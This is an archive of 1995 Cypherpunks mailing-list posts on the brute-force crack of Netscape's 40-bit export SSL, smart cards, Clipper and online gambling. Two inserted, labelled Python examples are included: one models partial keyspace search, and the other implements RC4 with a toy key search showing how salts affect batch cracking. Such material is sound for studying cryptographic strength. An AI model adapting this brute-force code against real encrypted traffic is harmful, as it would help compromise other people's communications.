O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 20:14:26 PDT
To: Joe Buck <jbuck@Synopsys.COM>
Subject: Re: SSL challenge -- broken !
Message-ID: <199508170312.XAA45301@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Joe Buck <jbuck@Synopsys.COM> wrote:

<snip>

>Yes, it's true that {fraud} contributes to high interest rates (though
>defaults cost more than fraud).

Sometimes there's little difference.

<snip>

>> They only *sometimes* find the person/loot.
>
>Doesn't matter, this is a disincentive to theft and you are never liable
>unless you lost your physical card.

I was referring to my previous point, whether or not you're
*individually* liable, "somebody" always pays.

<snip>

>It would cost billions to get every single merchant that accepts credit
>cards set up with PIN equipment.

Agreed. Fraud/defaults cost billions too, the billions I propose
spending would be a one-time, rather than yearly, cost.

>
>> Why not PIN numbers.

<snip>

>
>You have to make sure the clerk that gets your order doesn't see the
>PIN (so you need a secure path between you and your credit card co.
>that avoids the merchant).

I was thinking of some piece of hardware the clerk could hand you,
but "shoulder surfing," by the clerk or by other customers, will
always be possible, just as with ATMs or phonecards.
My idea isn't perfect, just better than the present reality, IMO.

>And what about the tellers?  Do you know
>how badly they are treated?  They can get all those #'s.  Yes, it
>can be done: ATMs are set up that way.  But as long as it's not done,
>those who scream at the horrors of sending credit card #'s over the
>net aren't thinking clearly.
>
>Never forget that social engineering is the easiest hack.  Technical
>solutions that ignore wide-open social engineering paths are worse
>than useless (worse because they give an illusion of security).

Agreed. My idea *is* imperfect. Social engineering works well.
I just don't want to let the great be the enemy of the good,
and the credit card fraud situation now is intolerable.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDKxtm1lp8bpvW01AQFiCQQArDkX2OS/9FitoMYfKHa2K5O9UsAw+Yv9
yVrp1T8NtvieQkVMEpAbhAq3ISEcam2WsVOAOUPT7goK4yyzSz2UURaDsAru8kRO
66A9p0QSmS7sciNV4N2tGz/KlM44wV8axNs/9R9AAktnHhD/YbhtF0ONXTUXzrDi
FwTSwgVD71o=
=a9+Y
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 16 Aug 95 22:28:32 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge - Some thoughts
Message-ID: <v01510103ac588f7b2979@[204.248.80.18]>
MIME-Version: 1.0
Content-Type: text/plain


1. What kind of pseudo random number generator does Netscape use?

2. If it is a cryptographically secure sequence, doesn't that run up
against ITAR restrictions?

3. Can we improve upon the brute force algorithm in a non-probabilistic way?

4. If we are happy with a 5% yield, we can restrict ourselves to the same
5% of the key space for each message.

DJK
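
Point 4 of the post above can be checked with a short model. This is an added example, not part of the original post: it assumes message keys are uniform and independent and that the searcher scans keys in a fixed order, and the function names are illustrative.

```python
import math
import random


def expected_trials_per_key(key_bits, fraction):
    """Analytic expected key trials spent per recovered key.

    Assumed model: every message key is uniform over 2**key_bits, and the
    searcher scans keys 0, 1, 2, ... in order, stopping on a hit or once the
    first `fraction` of the keyspace has been tried.
    """
    n = 1 << key_bits
    s = int(n * fraction)          # keys tried before giving up on a message
    p_hit = s / n                  # the "yield": chance the key is in the slice
    hit_cost = (s + 1) / 2         # average trials when the key is in the slice
    miss_cost = s                  # whole slice scanned for nothing
    per_message = p_hit * hit_cost + (1 - p_hit) * miss_cost
    return per_message / p_hit


def work_in_bits(key_bits, fraction):
    """log2 of the expected trials per recovered key."""
    return math.log2(expected_trials_per_key(key_bits, fraction))


def simulate(key_bits, fraction, messages, seed=1995):
    """Monte Carlo check of the same model on a small, constructed keyspace."""
    rng = random.Random(seed)
    n = 1 << key_bits
    s = int(n * fraction)
    trials = 0
    hits = 0
    for _ in range(messages):
        key = rng.randrange(n)     # constructed sample key, uniform at random
        if key < s:
            trials += key + 1      # found after scanning up to the key
            hits += 1
        else:
            trials += s            # slice exhausted, message abandoned
    return {
        "yield": hits / messages,
        "trials_per_key": trials / hits if hits else float("inf"),
    }


if __name__ == "__main__":
    for frac in (1.0, 0.05):
        sim = simulate(16, frac, 20000)
        print(f"16-bit toy keyspace, fraction {frac}: "
              f"yield {sim['yield']:.3f}, "
              f"{sim['trials_per_key']:.0f} trials per recovered key")
    for frac in (1.0, 0.05):
        print(f"40-bit keyspace, fraction {frac}: "
              f"2^{work_in_bits(40, frac):.2f} trials per recovered key")
```

Under this model the fixed 5% slice bounds the work per message but costs about twice as many trials per recovered key as a full search, so the work per compromised key is still set by the key length.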






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Wed, 16 Aug 95 22:57:09 PDT
To: rah@shipwright.com
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
In-Reply-To: <v02120d01ac57cb36e14b@[199.0.65.105]>
Message-ID: <9508170554.AA17364@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: rah@shipwright.com (Robert Hettinga)

>I can see the headlines now: "Netscape Security Broken, Stock Falls".

Bob,

So can I... :-(

Too bad Damien didn't wait until after the date one could legally
short the stock.  That would have been the perfect time for a media
frenzy on the issue.  The announcement of SSL having been broken is
occurring too soon to be at all useful in the financial sense.  The
media frenzy, if it happens, will now occur well before the 30-day
lock-out on shorting a new issue.  What a shame. <arg>!

Loren




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 17 Aug 95 02:49:05 PDT
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: SSL challenge -- broken !
Message-ID: <199508170946.CAA26868@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:39 PM 8/16/95 -0500, you wrote:
>> I haven't seen any news stories about this on the wire
>> services. Someone would have to write a story about it first before
>> people would know...
>
>I've suggested this to a few reporters I know..

It's worth suggesting this _carefully_ so the spin's right.
For instance "Oh, no, Netscape lets Hackers suck all the money
out of your credit cards" would be bad :-)  On the other hand,
"The US Government's Evil Plans to block encryption are limiting
Netscape's export products to an encryption system already broken
by a French university.  This means you can send credit card numbers
safely to American web sites, but not to foreign ones - like the
airline or hotel reservations you were making for your vacation,
or those Irish handcrafts or bottle of Scotch you were ordering,
or that Hong Kong magazine you were subscribing to, or the CD from
that band in Budapest that had the great sound samples out there.
And when you were donating to that Amazon rainforest conservation
group, the NSA's arbitrary export rules may have just helped the
Colombian drug cartels rip off your credit card."
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Thu, 17 Aug 95 01:25:20 PDT
To: cypherpunks@toad.com
Subject: SmartCash
Message-ID: <199508170825.DAA16917@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




Alliance formed to develop first nationwide smart card
company


New York, Aug. 16 (Reuters) - The United States is a step 
closer to cashless commerce.

Fourteen banks and financial institutions said Wednesday
that they will form a company to develop and issue the
first debit card that can be used nationwide instead of
cash for purchases under $20.

The new company, to be called SmartCash, will help speed
the implementation of so-called "smart card" technology
that uses a micro-processor chip embedded in the card to
store vast amounts of information, including improved
security features.

"The chip gives the card an amazing ability to contain
stored information," said Nancy Elder, a spokeswoman for
MasterCard International Inc., one of the companies
participating in the creation of SmartCash.

In addition to Mastercard International, other founding
companies include Banc One Corp., Bank of America,
Chemical Bank Corp., CoreStates Financial Corp.,
NationsBank Corp. and Wachovia Corp. However,
participation in SmartCash will be open to all U.S.
financial institutions and card providers, the companies
said.

"SmartCash represents a shared vision and a shared
commitment to deliver the increased convenience,
flexibility and efficiency of electronic cash to U.S.
consumers, merchants and banks," said Hatim Tyabji,
chairman of VeriFone Inc., a pioneer in stored value
technology and another founder of SmartCash.

The SmartCash card also will be standardised with similar
efforts already underway for smart cards developed by
credit card companies Europay, MasterCard and Visa.

"Standardized specifications are all woven into the
process. If you use your card in New York, it will be the
same as if you use it on the West Coast," Elder said.

The stored value application, one of the many uses of the
card's embedded chip, enables funds from the cardholder's
bank or credit-card account to be loaded into the card
from an automated teller machine or from one of the
terminals now under development specifically for the
SmartCash card.

Elder said the companies have not identified what the
cost to the consumer would be, but noted, "the consumer
is going to have to see the value in it for them to want
to use it."

She also said there was a potential for the card to be
expanded for use by those without bank accounts, who
could credit the card in person at various locations.

Elder added that the demand for such a versatile card was
the driving force behind the broad alliance of companies
already signed on to the SmartCash plan.

"Sixty percent of consumers surveyed in the U.S. said
they would be willing to switch banks to get the use of
stored value (cards)," Elder said.

Amy Brinkley, executive vice president at NationsBank,
said the venture showed "unprecedented industry
cooperation to develop an innovative financial product."

SmartCash will combine assets and staff of the founding
companies and pursue technology being developed by
MasterCard, VeriFone, Electronic Payment Services Inc.,
and privately held Gemplus.

A pilot programme is already under development in
Delaware that will be overseen by Wilmington Trust and
Electronic Payment and other regional pilot programmes
were likely to spring up around the country next year,
Elder said.

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 17 Aug 95 00:53:42 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <9508170022.AA19096@cs.umass.edu>
Message-ID: <Pine.D-G.3.91.950817035141.3096A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Aug 1995, Futplex wrote:

> Dave Banisar quotes FBI documents obtained via the FOIA:
> >      Technical solutions, such as they are, will only work if 
> >      they are incorporated into *all* encryption products.  
> >      To ensure that this occurs, legislation mandating the 
> >      use of Government-approved encryption products or 
> >      adherence to Government encryption criteria is required.
> 
> ...meanwhile...
> > Testifying before a Senate Judiciary 
> > Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
> > Harris asserted that:
> > 
> >      As the Administration has made clear on a number of 
> >      occasions, the key-escrow encryption initiative is a 
> >      voluntary one; we have absolutely no intention of 
> >      mandating private use of a particular kind of 
> >      cryptography, nor of criminalizing the private use of 
> >      certain kinds of cryptography.
>        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
> By exactly what mechanism are appointed (hired ?) officials such as AAG Harris
> supposedly accountable to the public ?  Can they be brought up on perjury
> charges ?  Just what real legal recourse do we have against lying scum in the
> bureaucracy ?  Are we stuck unless we can get some Congresscritter to cry
> foul on the floor of the House or Senate ?

You sure are anxious to prosecute government officials.  What is untrue 
about her statement?  Maybe she meant it's OK to use ROT-13 but nothing 
else ...

And you guys complained about the Jake Baker prosecution!

BTW, Harris is no longer AAG-Criminal Division.  She went back to 
teaching, keeping a commitment she made to her family.  And yes, she was 
appointed by the President and confirmed by the Senate.


 
> -Futplex <futplex@pseudonym.com>
> "you said too much; and what you said, it was a lie" -EMF
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 17 Aug 95 03:40:34 PDT
To: cypherpunks@toad.com
Subject: Re: SmartCash (NewsClip)
Message-ID: <199508171040.GAA15464@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>She also said there was a potential for the card to be
>expanded for use by those without bank accounts, who
>could credit the card in person at various locations.

Or even those who don't exist.  Sounds like real cash to me.  Note that 20%
of the population have no bank accounts.

DCF

"Coercion-based systems only work if the person coerced is immobile, stupid,
or weak."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 16 Aug 95 22:14:16 PDT
To: cypherpunks@toad.com
Subject: SmartCash (NewsClip)
Message-ID: <199508170514.HAA29043@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Alliance formed to develop first nationwide smart card
company


New York, Aug. 16 (Reuters) - The United States is a step 
closer to cashless commerce.

Fourteen banks and financial institutions said Wednesday
that they will form a company to develop and issue the
first debit card that can be used nationwide instead of
cash for purchases under $20.

The new company, to be called SmartCash, will help speed
the implementation of so-called "smart card" technology
that uses a micro-processor chip embedded in the card to
store vast amounts of information, including improved
security features.

"The chip gives the card an amazing ability to contain
stored information," said Nancy Elder, a spokeswoman for
MasterCard International Inc., one of the companies
participating in the creation of SmartCash.

In addition to Mastercard International, other founding
companies include Banc One Corp., Bank of America,
Chemical Bank Corp., CoreStates Financial Corp.,
NationsBank Corp. and Wachovia Corp. However,
participation in SmartCash will be open to all U.S.
financial institutions and card providers, the companies
said.

"SmartCash represents a shared vision and a shared
commitment to deliver the increased convenience,
flexibility and efficiency of electronic cash to U.S.
consumers, merchants and banks," said Hatim Tyabji,
chairman of VeriFone Inc., a pioneer in stored value
technology and another founder of SmartCash.

The SmartCash card also will be standardised with similar
efforts already underway for smart cards developed by
credit card companies Europay, MasterCard and Visa.

"Standardized specifications are all woven into the
process. If you use your card in New York, it will be the
same as if you use it on the West Coast," Elder said.

The stored value application, one of the many uses of the
card's embedded chip, enables funds from the cardholder's
bank or credit-card account to be loaded into the card
from an automated teller machine or from one of the
terminals now under development specifically for the
SmartCash card.

Elder said the companies have not identified what the
cost to the consumer would be, but noted, "the consumer
is going to have to see the value in it for them to want
to use it."

She also said there was a potential for the card to be
expanded for use by those without bank accounts, who
could credit the card in person at various locations.

Elder added that the demand for such a versatile card was
the driving force behind the broad alliance of companies
already signed on to the SmartCash plan.

"Sixty percent of consumers surveyed in the U.S. said
they would be willing to switch banks to get the use of
stored value (cards)," Elder said.

Amy Brinkley, executive vice president at NationsBank,
said the venture showed "unprecedented industry
cooperation to develop an innovative financial product."

SmartCash will combine assets and staff of the founding
companies and pursue technology being developed by
MasterCard, VeriFone, Electronic Payment Services Inc.,
and privately held Gemplus.

A pilot programme is already under development in
Delaware that will be overseen by Wilmington Trust and
Electronic Payment and other regional pilot programmes
were likely to spring up around the country next year,
Elder said.

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Aug 95 05:07:50 PDT
To: cypherpunks@toad.com
Subject: WSJ on SSL Crack
Message-ID: <199508171207.IAA15512@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, August 17, 1995, p. B3.


   French Hacker Cracks Netscape Code, Shrugging Off U.S.
   Encryption Scheme

   By Jared Sandberg


   A computer hacker in France has breached the encryption
   scheme of new Netscape software for navigating the
   Internet, the global computer network. The breach
   underscores flaws in U.S. rules restricting the export of
   more-sophisticated security measures.

   The hacker, a French student at the Ecole Polytechnique,
   cracked the weaker encryption scheme that U.S. government
   policy forces Netscape Communications Corp. to use in a
   foreign version of its Navigator software. Yesterday, he
   posted the results of his efforts on the Internet's
   Cypherpunks discussion group.

   The student took up a challenge issued on July 14 in the
   Cypherpunks group, which is frequented by cryptography
   experts and hackers and mathematicians. He used 120
   powerful computer workstations and two supercomputers to
   crack a piece of information encrypted in Netscape's
   "browser" software. The security is aimed at scrambling
   sensitive financial data to keep credit-card numbers, sales
   transactions and other material safe from break-ins.

   The highly sophisticated computers took eight days to break
   the code -- far more power and time than the typical
   illegal hacker would be able to muster for criminal
   pursuits. But the chore nonetheless highlights the
   vulnerabilities that could make customers shy away from
   conducting commerce on the Internet, particularly
   international users who can't get hold of the tougher
   security measures allowed within the U.S.

   The French hacker was able to crack the so-called 40-bit
   encryption scheme in Netscape's overseas version of its
   software. In the U.S., Netscape employs a far more powerful
   design -- 128 bits, a number that refers to length of the
   encoding "key," which is used to scramble data.

   U.S. rules limit Netscape to exporting only 40-bit
   encryption overseas. Yet the 128-bit version takes
   exponentially more power to crack: Compared with violating
   the 40-bit scheme, the 128-bit key would take
   10-to-the-26th-power more time to breach, experts say.
   That's a 1 followed by 26 zeroes, a factor of time that
   makes it all but impossible for hackers to break in.

   Netscape wasn't surprised at the findings. The company said
   it has always known and stated that 40-bit security could
   be breached by "brute force," the use of massive computing
   power to descramble the information.

   "This is a good indication of why the government should
   allow us to ship more secure software," said Mike Homer,
   Netscape's vice president of marketing. "The laws are
   archaic."

   Clinton administration officials have viewed strong
   encryption as a weapon for foreign terrorists, who could
   exchange communications without fear of eavesdropping by
   law enforcement officials.

   That policy, however, has raised the hackles of industry
   executives, who say that without strong encryption abroad,
   the growth of electronic commerce could be significantly
   stunted. Last week, a group of software executives told the
   White House that restrictive export regulations might blunt
   American competitiveness in foreign markets.

   "Netscape security is fine," said Dietrich Cappe, a senior
   partner at Red Planet LLC, an Internet consulting company.
   "As long as the government's export restriction exists,
   commerce is going to be severely hampered." Netscape
   licenses the encryption algorithm from RSA Data Security
   Inc., one of the most prominent software security firms
   that licenses its software to most major software
   companies. "We've warned the government that the level of
   security they allow our customers to export is too weak,"
   said James Bidzos, president of RSA. "Maybe they'll listen
   now."

   Netscape's Mr. Homer noted, however, that the amount of
   effort and computing power, which could cost as much as
   $10,000 in addition to the cost of the machines, don't make
   even breaches of 40-bit security practical from a thief's
   perspective.

   "You'd be better off working in a shoe store, stealing
   credit card numbers for a week," Mr. Homer said.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 05:33:52 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508171232.IAA02057@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



It has occurred to me that, because the RC4 key crackers spend most of
their time in key setup, you can crack N SSL sessions that you
captured in not substantially more time than it took to crack 1. This
is analogous to the way brute force Unix password file hacking operates.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 08:39:23 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161832.OAA19556@frankenstein.piermont.com>
Message-ID: <199508171539.IAA02929@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> > > Hal <hfinney@shell.portal.com> writes:
> > > I am a little alarmed by the suggestion that this news could have some
> > > marked impact on the Netscape stock price.  From our perspective this was

> Jim Gillogly writes:
> > So far it appears not to have had an effect.  The two web pages I know abou

> "Perry E. Metzger" <perry@piermont.com> writes:
> I haven't seen any news stories about this on the wire
> services. Someone would have to write a story about it first before
> people would know...

I note that Netscape is down 3 at the moment... cause and effect are hard
to identify, of course, since the stock has been waving around a lot since
its IPO a week ago.  In any case, provisional full marks to Perry.

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 15:38




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 09:14:29 PDT
To: cypherpunks@toad.com
Subject: Re: Out of state gambling
Message-ID: <ac58b316100210043f2c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/17/95, Anonymous wrote:
>Hello C-Punks:
>
>(nb This is posted anonymously because I had this idea the implementation
>of which would be (probably) illegal.  I'm not sure whether putting my

It's being done. Many of us have talked about the implications of this.
Writing about it is not against the law in the U.S., at this time. A little
matter of the First Amendment,  don't you know.

See for example the Cypherpunks Web site archives,
http://www.hks.net/cpunks/index.html, or grep/search for "gambling" in my
Cyphernomicon FAQ (in my ftp directory at Netcom: ftp.netcom.com,
/pub/tc/tcmay/CP-FAQ, and in a couple of Web sites, including
http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ).

My point? Not a bad idea, but also not one you should have any fear of
discussing publicly (unless you believe certain conspiracy theories!).

I've been talking and writing about the implications of this stuff since
late 1987, and have not yet been "disappeared." I don't happen to like a
lot of what's going on in Washington, but I doubt that Louis Freeh or
Dorothy Denning are going to silence or threaten me!


>name to the idea would be a good idea for the reason that I can't be
>sure that I wouldn't be implicated under the overbroad "conspiracy" or
>"Rico" powers which are oh so popular as a way of putting people away
>for thought crimes.  This message will in any case have appeared via

I'm not a fan of RICO either, but we need to be careful not to impute to
RICO things which just don't happen. So far as I know, no "thought crimes"
have been prosecuted under RICO. Prosecutors--and I am not one, but I watch
them all day on t.v.!--have certain procedures they have to follow. They
just don't have the time, budget, and mandate to try to prosecute writers
and speakers, especially when the words and speech are clearly protected
under the First Amendment.

The _potential_ prosecution of Phil Zimmermann--and I say "potential"
because at the time I'm writing this, no indictment has been made--is not
because Phil was writing inflammatory stuff, but is related to the
circumstances surrounding the appearance of PGP 1.0 in foreign countries.
These would be ITAR issues, not "thoughtcrime." Or at least this is what
most people believe is the issue, as the Grand Jury has not said anything
publicly.

(By the way, I'm not being critical of Anonymous here. I, too, have used
the term "thoughtcrime," as shorthand for what I think are the implications
of certain trends in the U.S. and elsewhere. Criminalizing "hate speech"
fits the Orwellian definition, in my opinion. But we all have to be careful
not to use this metaphor too broadly.)


>a couple of foreign remailers on its way. I am proud of the idea, but
>I appreciate those of you who know who I am keeping quiet about it, as
>I'm just being prudent, and extra cautious.
>
>The idea.....Out of state gambling, Internet style - let's give them a
>taste of what's to come.

As you note, the Internet Casino does this (they claim), becoming
operational "soon." Also, various sports books are accessible in offshore
locations, such as Costa Rica. Phone calls.

And the idea of betting on events and outcomes is already extant. Lloyd's
of London used to take such bets.

But more germane to the Internet, there are several groups working on "idea
futures." Robin Hanson, at Caltech, is working on this. And a Web page
exists with various odds on different situations, such as "Windows '95 will
be delayed 3 months" and "Strong crypto will be banned by April 1996."

Try a Web search on "bet" and "gambling." I did one on "bet" and got a hit
on "Proposition Wagering": http://www.netaxs.com/people/sportbet/prop.htm.
(I couldn't get into it, so your mileage may vary.)

>The aim in writing this short missive to cpunks is to encourage
>someone who is more able legally to help this idea happen.

It'll only happen when someone makes it happen. Thinking about it can also
be useful, as the actual programmers may not have the same focus, but
actual examples carry more weight.

We saw betting schemes on the Extropians list, a couple of years ago.
Fairly primitive, but an example.

>Any comments on the practical and legal issues (such as exactly what
>laws I'm violating) or on getting publicity for such a scheme? This
>might be easier than we think, as the media [at least the WSJ] is well
>aware of the bookie's superior accuracy & lower cost.

First, don't worry too much about remaining anonymous. Discussing an idea,
even building a system, is not the same as operating it. Folks publicly
discuss and build  remailers, but operating them is another matter. (Yes,
folks here also operate remailers....).

Second, check out the "idea futures," "proposition wagering," and "betting"
references.

Third, build on what these folks are doing. Or do it differently, but only
if your approach is superior.

Good luck!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 17 Aug 95 01:26:37 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161745.KAA08481@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.950817091924.25225B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Aug 1995, Hal wrote:
 
> Ironically, I understand that an independent effort coordinated by Adam
> Back also discovered the key at approximately the same time. In
> addition, Eric Young had done a search starting at 8000000000 and
> upwards; unfortunately the key value of 7ef0961fa6 was only about one
> percent below his starting point.  Hopefully Adam will supply more
> information.

Dave Byers found it with his MasPar while searching the space that Eric 
had left out.  The MasPar was getting 1.4M keys per second and hence 
could search the entire 40 bit keyspace in about 9 days anyway.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 06:46:00 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: SSL challenge -- broken !
In-Reply-To: <7033.9508171341@exe.dcs.exeter.ac.uk>
Message-ID: <199508171344.JAA02573@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



aba@atlas.ex.ac.uk writes:
> The actual key used is the 40 bit key you're bruting, plus what is
> effectively an 88 bit salt (in unix password nomenclature, only unix
> password salts are typically 12 bits).

Yup, you are right. Slipped my mind. (A mind is a terrible thing to
slip...)

.pm
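
The salt point conceded above, as an added example that is not part of the original messages: it counts RC4 key setups for a search over several captured sessions, with and without a per-session clear salt. It assumes a simplified model (RC4 key = clear salt || secret bits, which is not SSL's actual key derivation), a toy 10-bit secret, and constructed sessions; all function names are hypothetical.

```python
# Added example, not code from the thread. Simplified model: the RC4 key is
# clear_salt || secret_bits. This is NOT SSL's real key derivation.

SECRET_BITS = 10                 # toy size so this runs quickly; export SSL hid 40 bits
SALT_BYTES = 11                  # 88 clear bits, the figure quoted in the message
KNOWN = b"GET / HTTP/1.0\r\n"    # constructed known plaintext


def rc4_keystream(key, n):
    """Standard RC4: key setup (KSA), then n bytes of keystream (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key setup: 256 swaps per key tried
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def make_session(salt, secret):
    """A captured session: the salt travels in the clear, the secret does not."""
    key = salt + secret.to_bytes(2, "big")
    return {"salt": salt, "ct": xor(KNOWN, rc4_keystream(key, len(KNOWN)))}


def build_sessions(secrets, salted):
    """Constructed sample data: distinct salts per session, or one shared salt."""
    sessions = []
    for n, secret in enumerate(secrets):
        salt = bytes([n + 1]) * SALT_BYTES if salted else b"\x00" * SALT_BYTES
        sessions.append(make_session(salt, secret))
    return sessions


def search(sessions):
    """Full search of the secret bits; returns ({session index: secret}, key setups).

    One key setup can be tested against every session that shares a salt,
    so the setup count is (number of distinct salts) * 2**SECRET_BITS.
    """
    by_salt = {}
    for idx, sess in enumerate(sessions):
        by_salt.setdefault(sess["salt"], []).append(idx)
    found, setups = {}, 0
    for salt, idxs in by_salt.items():
        for cand in range(1 << SECRET_BITS):
            ks = rc4_keystream(salt + cand.to_bytes(2, "big"), len(KNOWN))
            setups += 1
            for i in idxs:                    # cheap compare, no extra key setup
                if xor(sessions[i]["ct"], ks) == KNOWN:
                    found[i] = cand
    return found, setups


def days_for(distinct_salts, bits=40, keys_per_second=1.4e6):
    """Full-keyspace search time at the MasPar rate quoted in the thread."""
    return distinct_salts * 2 ** bits / keys_per_second / 86400


if __name__ == "__main__":
    secrets = [5, 700, 1023, 42]              # constructed toy secrets
    for salted in (False, True):
        found, setups = search(build_sessions(secrets, salted))
        print("salted" if salted else "shared salt", found, setups, "key setups")
    print("40-bit search, 1 session : %.1f days" % days_for(1))
    print("40-bit search, 4 sessions: %.1f days" % days_for(4))
```

With a shared salt the four sessions fall to one pass over the keyspace; with distinct salts the work scales linearly with the number of sessions, which is why the Unix password file analogy does not carry over.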




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 17 Aug 95 06:56:00 PDT
To: cypherpunks@toad.com
Subject: (fwd>>)309,485,009,821,345,068,724,781,056
Message-ID: <v02120d04ac58ea2e90b9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming - CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Thu, 17 Aug 1995 08:39:37 AM PDT
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: 309,485,009,821,345,068,724,781,056

Like .. er ... a big number maan.

"SSL" has not been cracked "EXPORT SSL" has been cracked.  Then
if someone in the next few years can crack SSL with a confidential
master key of 128 bits with 2^88 as many required key checks (say
half the keyspace at 2^87 as our mate Damien did) then that will be
a much bigger story.

Then again it was not me floating last week ....

In the mean time we encounter the usual inane US government's
export restrictions.  Can someone put in a word for me please ...

Please Please Please Mr Clinton .... keep those export regulations
It gives people like myself a major commercial lead in provision of
encryption software.

So what can we do.

Well not being a very trusting soul at times I tried out sending the
01 (SSL 128 bit confidential) message to an export Netscape browser and
lo and behold it came up with a cipher conflict.  Well that would have
been an easy way out.

